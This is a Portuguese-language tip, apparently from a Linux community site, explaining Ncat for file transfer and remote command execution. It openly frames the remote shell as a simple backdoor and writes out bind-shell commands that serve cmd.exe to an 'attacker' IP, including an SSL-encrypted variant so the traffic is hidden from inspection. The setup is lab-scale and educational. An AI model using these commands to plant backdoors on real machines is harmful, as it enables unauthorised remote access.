Ncat com SSL

Publicado por Roberto Soares (3spreto) em 07/11/2011

[ Hits: 7.938 ]

Blog: http://codesec.blogspot.com

 


Ncat com SSL



Acredito que a grande maioria conhece o Netcat, não? Pois bem, em uma espécie de variação, surge o Ncat. Sim, são diferentes antes que perguntem. Porém a grande maioria de suas funcionalidades se assemelham comparando-as entre si.

O Ncat utiliza os protocolos TCP e UDP para sua comunicação e também funciona sobre o IPv4 e o IPv6. Uma das características mais simples do Ncat é a transferência de dados entre dois Hosts (Linux <--> Linux, Windows <--> Windows ou Linux <--> Windows) de forma simplificada.

Também nos dá a possibilidade de executar comandos remotamente como se estivéssemos em nossa própria máquina, ainda se não bastasse, conseguimos prover uma "dose" considerável de segurança, utilizando o SSL (Secure Sockets Layer), que é um protocolo criptográfico responsável por prover uma comunicação segura sob a Internet.

Imagine isso para um backdoor simples heim?

Onde:
  • 192.168.0.125 é o IP do atacante. (BackTrack)
  • 192.168.0.147 é o IP do alvo. (XP)

Sem SSL

No alvo digite o comando:

ncat.exe -v -l 1337 -e cmd --allow 192.168.0.125
Linux: Ncat com SSL
E na máquina do atacante digite:

# ncat -v 192.168.0.147 1337
Linux: Ncat com SSL

Com SSL

No alvo digite o comando:

ncat.exe -v -l 1337 --ssl -e cmd --allow 192.168.0.125
Linux: Ncat com SSL
E na máquina do atacante digite:

# ncat -v --ssl 192.168.0.147 1337
Linux: Ncat com SSL
Agora utilize o wireshark com apenas o filtro "tcp". Em ambas as formas, clique com o botão direito do mouse nas conexões tcp e vá em "Follow Stream" e compare. :D

Ncat Help
Linux: Ncat com SSL

Transferência de arquivos

Ok, ok, antes de perguntarem sobre como efetuar a transferência de um arquivo entre 2 Hosts Linux, aqui vai os comandos.

Máquina que receberá o arquivo.
Linux: Ncat com SSL
Máquina que enviará o arquivo.
Linux: Ncat com SSL
Veja o novo conteúdo do arquivo.
Linux: Ncat com SSL

Links

Previamente publicada em: Até a próxima!
:wq!

Outras dicas deste autor

Instalando o nginx no CentOS 7

Redirecionamento de portas com socat

Escutar e gravar rádios online

WPSPLOIT - Explorando o WordPress com Metasploit

Web Application Security com CAL9000

Leitura recomendada

Ativando a verificação em duas etapas no login sob LightDM ou GDM

Acesso externo - estação interna

Snort - Instalação e configuração

Recuperando a senha do root no Red Hat com Grub

Vulnerabilidade na variável PATH

  

Comentários

Nenhum comentário foi encontrado.



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts